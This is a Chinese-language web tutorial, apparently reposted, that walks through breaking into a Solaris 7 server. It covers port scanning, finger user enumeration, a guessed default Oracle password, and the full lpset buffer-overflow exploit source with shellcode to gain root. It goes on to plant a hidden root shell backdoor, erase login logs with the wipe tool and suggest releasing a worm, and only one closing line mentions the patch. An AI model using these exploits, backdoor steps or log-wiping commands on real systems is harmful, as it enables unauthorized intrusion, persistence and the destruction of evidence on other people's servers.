4周前 (09-17) 中国互联安全响应中心  渗透注入
文章评分 0 次,平均分 0.0

今天我想给大家介绍的是Sunos 。 Sunos是一个非常好的Unix操作系统,功能强大。很多大型公司都采用此系统作为服务器系统。(例如:sina、163等。)至于它的漏洞,也是多不胜数的了。今天我就介绍一下这个系统的漏洞。

Unix:Unix操作系统自70年代由贝尔实验室推出以来,80年代经过大学、研究所、工业实验室的应用和发展,现已成为全球各大学、研究所及工业研究室、计算机网络通信、工作站系统的主流工具,并开始进入商业市场和个人电脑领域。尤其是美国在1994年率先提出信息高速公路(Information Super Highway)的构想,更UNIX的发展应用推波助澜。到目前为止UNIX用户已经达到200万户,其成长速度之惊人,前所未有。UNIX提供多用户、多任务的操作环境,其网络工具使计算机远程通信、并行处理、资源分配等有了更广阔的应用前景。尤其是它的X Window系统函盖了传统的DOS命令行和视窗系统的优点。

 

Solaris与Sunos的版本转换:

Solaris 8 = Sunos 5.8,Solaris 7 = Sunos 5.7,Solaris 2.6 = Sunos 5.6,Solaris 2.5 = Sunos 5.5……

因为自Sunos 5以后,就叫Solaris了。

Solaris也有分服务器版和个人版,它们分别是:

服务器版:sparc

个人版:x86

通常个人是不会安装Solaris的。

Solaris主要的漏洞有:

远程漏洞:

RPC:

rpc.ttdbserverd :Solaris 2.3,2.4, 2.5, 2.5.1, 2.6

rpc.cmsd:Solaris 2.5, 2.5.1, 2.6, 7

其他:

sadmind:solaris 2.6, 7

snmpXdmid:Solaris 7, 8

本地漏洞:

lpset:Solaris 2.6,7

本次范例需要的系统及程序情况如下:

操作系统:Window2000

对方操作系统:Sunos 5.7 (solaris 7)

程序(一):lpset.c

程序(二):Superscan 3.0

程序(二):wipe-1.00

本机IP:127.0.0.1

测试IP:127.0.0.17

新程序说明:

“lpset.c”是利用solaris 7和solaris 2.6的/usr/bin/lpset -a 缓冲区溢出漏洞所写的一个exploit。

Solaris 7 lpset -a 缓冲区溢出漏洞

Solaris 2.6和Solaris 7中所带的lpset缺省设置了suid root位,它的一个执行选项"-a"在处

理时存在问题,它会将提供给"-a"的参数不加判断的拷贝到一个固定大小的buffer(900多字节)

中,当用户提供一个包含可执行代码的很长的字符串时,将导致lpset以root身份执行任意命令。

尽管lpset缺省只允许root和sysadm组的用户执行,但是,由于溢出发生在进行执行权限判断操

作之前,任意本地用户都可以利用这个漏洞获取root权限。

wipe-1.00:unix和liunx下,一个非常好用的日志清除程序。

新名词讲解:

肉鸡:已经被攻击了,具有控制权的主机。

跳板:利用此主机作跳板,攻击其他主机。

shell:shell是系统与用户的交换式界面。简单来说,就是系统与用户的“沟通”环境。我们平时经常用到的DOS,就是一个shell。(Windows2000是cmd.exe)

root:Unix里最高权限的用户。也就是超级管理员。

admin:Windows NT里最高权限的用户。也就是超级管理员。

rootshell:通过一个溢出程序,在主机溢出一个具有root权限的shell。

exploit:溢出程序。exploit里通常包含一些shellcode。

shellcode:溢出攻击要调用API函数,溢出后要有一个交换式界面进行操作。所以就有了shell的code。

char shellcode[] = "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80" "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

这就是一个shellcode。

找一个Unix主机也是一种技巧。

1、首先,我们打开superscan。

设置:

IP:(需要扫描的IP地址。)

Start:127.0.0.1

Stop:127.0.0.255

Scan Type:(扫描类型设置。)

All ports from:23|23

然后,点击“Start”,开始扫描。

2、点击“Prune”,把多余的主机删除。

3、点击“Expand All”,把所有扫描到的主机打开。这时,在端口下面就会显示一些信息。这些信息就是端口的响应。

小技巧:

........#..'..$:这种响应,通常是Sunos主机的。

..... ..#..':这种响应,通常是liunx的。

假设,我们扫描到:127.0.0.17。

打开,Windows自带的“命令提示符”。

ping 主机:

主要目的是查看主机是否能连接。

D:\>ping 127.0.0.17

Pinging 127.0.0.17 with 32 bytes of data:

Reply from 127.0.0.17: bytes=32 time=191ms TTL=241

Reply from 127.0.0.17: bytes=32 time=170ms TTL=241

Reply from 127.0.0.17: bytes=32 time=160ms TTL=241

Reply from 127.0.0.17: bytes=32 time=170ms TTL=241

Ping statistics for 127.0.0.17:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 160ms, Maximum =  191ms, Average =  172ms

小技巧:

通常 TTL > 200的,都是liunx或者unix系统。

TTL < 200的,都是Windows 9x或Windows NT系统。

telnet主机:

主要看看telnet的banner。

D:\>telnet 127.0.0.17

SunOS 5.7

login:

solaris 7 的。

接着,我用Superscan扫描主机的端口。

方法:

打开superscan。

设置:

IP:

Start:127.0.0.17

Stop:127.0.0.17

Scan Type:(扫描类型设置。)

All ports from:1|65535

然后,点击“Start”,开始扫描。

扫描完毕后,点击“Expand All”,把所有扫描到的端口打开。

* + 211.99.25.1

|___ 7 Echo

|___ 9 Discard

|___ 13 Daytime

|___ 19 Character Generator

|___ 21 File Transfer Protocol [Control]

|___ 23 Telnet

|___ 25 Simple Mail Transfer

|___ 37 Time

|___ 53 Domain Name Server

|___ 79 Finger

|___ 111 SUN Remote Procedure Call

|___ 512 remote process execution;

|___ 513 remote login a la telnet;

|___ 514 cmd

|___ 515 spooler

|___ 540 uucpd

主要的端口有:21、25、53、79、111、513

其他还有:22、80等

端口的主要漏洞:

21:FTP的端口。主要漏洞是ftpd。如果允许anonymous(匿名)用户,而且具有读写权限,那么那台机子就是你的啦。假如你具有读写权限的用户密码,那就更加容易了。

22:ssh的端口。例如:SSH 3.0的远程登录漏洞等。

25:sendmail的端口。利用它的漏洞,我们可以D.O.S主机。freebsd的8.8.3版本还可以远程溢出rootshell。

53:DNS的端口。主要漏洞是bind。对于bind 8.2的DNS服务器,我们可以利用exploit溢出一个rootshell。

79:finger的端口。在unix和liunx都很有作用。对于Sunos,我们可以 finger 0@***.***.***.*** 刺探用户。对于,liunx可以 finger @***.***.***.*** 刺探当前在线的用户。

80:web的端口。这个端口就是我们平时浏览网站的默认端口。主要的漏洞有CGI漏洞。

111:rpc的端口。rpc漏洞是当今最流行的漏洞之一。每一个漏洞都可以远程溢出rootshell。例如:redhat的rpc.statd,Solaris的rpc.ttdbserverd等。

513:rlogin的端口。你可以向主机发送一条:echo '+ +' >/.rhost 如果成功,就可以不用密码rlogin到主机。

finger主机。

目的是利用finger漏洞寻找主机的用户。(取得主机的用户对入侵主机有很大帮助。)

D:\>finger 0@127.0.0.17

[127.0.0.17]

Login NameTTYIdle When Where

daemon ??? < .  .  .  . >

bin ??? < .  .  .  . >

sys ??? < .  .  .  . >

chenhy ???pts/7  <Aug  2 15:47> 61.158.255.225

mdevice???897 <Aug  4 17:25> 61.140.253.142

liuy???pts/5  <Aug  2 18:17> 211.101.132.50

oracle ???console  6:57 Mon 14:29  :0

oracle ???pts/24d Mon 14:29  :0.0

oracle ???pts/522 Sat 16:34  61.140.253.142

D:\>

存在finger漏洞。系统的用户显示出来了。(chenhy、mdevice、liuy、orcle)

oracle,通常oracle的密码就是oracle。

马上试一下!

D:\>telnet 127.0.0.17

SunOS 5.7

login: oracle

Password:

Last login: Sat Aug  4 17:25:49 from 61.140.253.142

Sun Microsystems Inc.SunOS 5.7 Generic October 1998

$

成功了!

假如在这一步并没有猜到用户的密码,我们可以利用其他工具继续猜测。

 

命令:uname -a

查看主机的信息。

$uname -a

SunOS mars 5.7 Generic_106541-08 sun4u sparc SUNW,Ultra-5_10

SunOS mars 5.7:SunOS的版本。

sparc:服务器版本。

Generic_106541-08:补丁情况。

 

找到exploit:lpset.c

$cat >lpst.c

/*## copyright LAST STAGE OF DELIRIUM apr 2000 poland  *://lsd-pl.net/ #*/

/*## /usr/bin/lpset #*/

#define NOPNUM 864

#define ADRNUM 132

#define ALLIGN 3

char shellcode[]=

"\x20\xbf\xff\xff"  /* bn,a <shellcode-4>  */

"\x20\xbf\xff\xff"  /* bn,a <shellcode> */

"\x7f\xff\xff\xff"  /* call <shellcode+4>  */

"\x90\x03\xe0\x20"  /* add  %o7,32,%o0  */

"\x92\x02\x20\x10"  /* add  %o0,16,%o1  */

"\xc0\x22\x20\x08"  /* st%g0,[%o0+8] */

"\xd0\x22\x20\x10"  /* st%o0,[%o0+16]*/

"\xc0\x22\x20\x14"  /* st%g0,[%o0+20]*/

"\x82\x10\x20\x0b"  /* mov  0xb,%g1  */

"\x91\xd0\x20\x08"  /* ta8  */

"/bin/ksh"

;

char jump[]=

"\x81\xc3\xe0\x08"  /* jmp  %o7+8 */

"\x90\x10\x00\x0e"  /* mov  %sp,%o0  */

;

static char nop[]="\x80\x1c\x40\x11";

main(int argc,char **argv){

char buffer[10000],adr[4],*b;

int i;

printf("copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd-pl.net/\n");

printf("/usr/bin/lpset for solaris 2.6 2.7 sparc\n\n");

*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;

b=buffer;

sprintf(b,"***=");

b+=4;

for(i=0;i<2;i++) *b++=0xff;

for(i=0;i<NOPNUM-4;i++) *b++=nop[i%4];

for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];

for(i=0;i<ALLIGN;i++) *b++=0xff;

for(i=0;i<ADRNUM;i++) *b++=adr[i%4];

*b=0;

execle("/usr/bin/lpset","lsd","-n","xfn","-a",buffer,"printer",0,0);

}

/*  www.hack.co.za  [4 August 2000]*/

^D (“^D” = Ctrl+D ,目的是结束。)

 

$cd /tmp

lpset.c放在/tmp目录了。

$ls

lpset.c

建立了。

$gcc -o lpset lpset.c

$

编译程序。

小技巧:Solaris默认是没有gcc的。我们可以用命令“whereis -b gcc”查找。因为管理员通常会在“/usr/local/bin”留下一个gcc的。

命令:chmod 777 lpset

设置程序“lpset”的属性为所有组所有用户都能访问。

$chmod 777 lpset

命令:./lpset

执行程序。

$./lpset

copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd-pl.net/

/usr/bin/lpset for solaris 2.6 2.7 sparc

sh: syntax error at line 1: `(' unexpected

#

命令:id

查看自己的所属的组别。

#id

uid=1035(delex) gid=20(staff) euid=0(root)

“euid=0(root)”取得root权限了。

做个后门:

# mkdir /usr/man/man5/shell

在man文件夹里新建一个文件夹,没那么容易给别人发现。(每台主机的情况都不同。)

# cp /bin/ksh /usr/man/man5/shell

# chmod 777 /usr/man/man5/shell

一个简单的后门就做好了。

以后,我们可以用oracle登陆,然后“./usr/man/man5/shell”取得root权限。

 

用wipe-1.00清除日志。

先把wipe-1.00.tgz上传到主机。

通常ftp的密码与telnet的密码一样。

# gzip -d wipe-1.00.tgz

# tar -xf wipe-1.00.tar

# cd wipe-1.00

# make

Wipe v0.01 !

Usage: 'make ' where System types are:

linux freebsd sunos4 solaris2 ultrix

aix irix digital bsdi netbsd hpux

#

其中:

linux freebsd sunos4 solaris2 ultrix

aix irix digital bsdi netbsd hpux

为“选择系统”。

我们这里用“solaris2”。

#make solaris2

gcc -O3 -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c

成功了。

#./wipe

USAGE: wipe [ u|w|l|a ] ...options...

UTMP editing:

Erase all usernames:wipe u [username]

Erase one username on tty:wipe u [username] [tty]

WTMP editing:

Erase last entry for user :wipe w [username]

Erase last entry on tty:wipe w [username] [tty]

LASTLOG editing:

Blank lastlog for user :wipe l [username]

Alter lastlog entry :wipe l [username] [tty] [time] [host]

Where [time] is in the format [YYMMddhhmm]

ACCT editing:

Erase acct entries on tty :wipe a [username] [tty]

说明:

u 选项为 utmp utmpx 日志清除。

w 选项为 wtmp wtmpx 日志清除。

l 选项为 lastlog 日志清除。

a 选项为 pacct 日志清除。

方法:./wipe u oracle;./wipe w oracle;./wipe l oracle

#./wipe u oracle;./wipe w oracle;./wipe l oracle

Patching /var/adm/utmp .... Done.

Patching /var/adm/utmpx .... Done.

Patching /var/adm/wtmp .... Done.

Patching /var/adm/wtmpx .... Done.

Patching /var/adm/lastlog .... Done.

其中oracle为刚才登陆的用户名。

小技巧:我们可以用 ./wipe u oracle 隐藏自己。

运行:./wipe u oracle 前

# w

下午 20:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名   终端号   登入时间   闲置   JCPU   PCPU   执行命令

oracle    pts/1   下午 20:00        3          w

运行:./wipe u oracle 后

# w

下午 20:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名   终端号   登入时间   闲置   JCPU   PCPU   执行命令

最后,我们可以放个worm寻找更多机子。

当然,我们的目的不是为了入侵。帮主机打上补丁是最好的主意。

解决方法:chmod -s /usr/bin/lpset

 

除特别注明外,本站所有文章均为铁匠运维网原创,转载请注明出处来自http://www.tiejiang.org/25184.html

中国互联是江苏邦宁科技有限公司旗下的著名IT服务供应商品牌之一,是国内IDC行业十大之一、企业互联网服务首选品牌。江苏邦宁科技成立于2003年,是国内互联网名称与数字地址服务、云数据中心机房服务的引领者,是行业云计算解决方案、网站智能建设、企业智能办公软件、移动互联网开发的创新者。自成立以来,公司秉承“一切为了客户满意”的核心理念,坚持“国际化、专业化、高端化”的发展思路,坚持“以客户需求为导向、以技术创新为基础、以服务创新为支撑”,先后为国内各级政府、社会服务机构、国内外众多500强企业及中小企业、个人客户提供了专业、高质、优越的互联网应用服务。

发表评论

暂无评论

切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

切换登录

注册

扫一扫二维码分享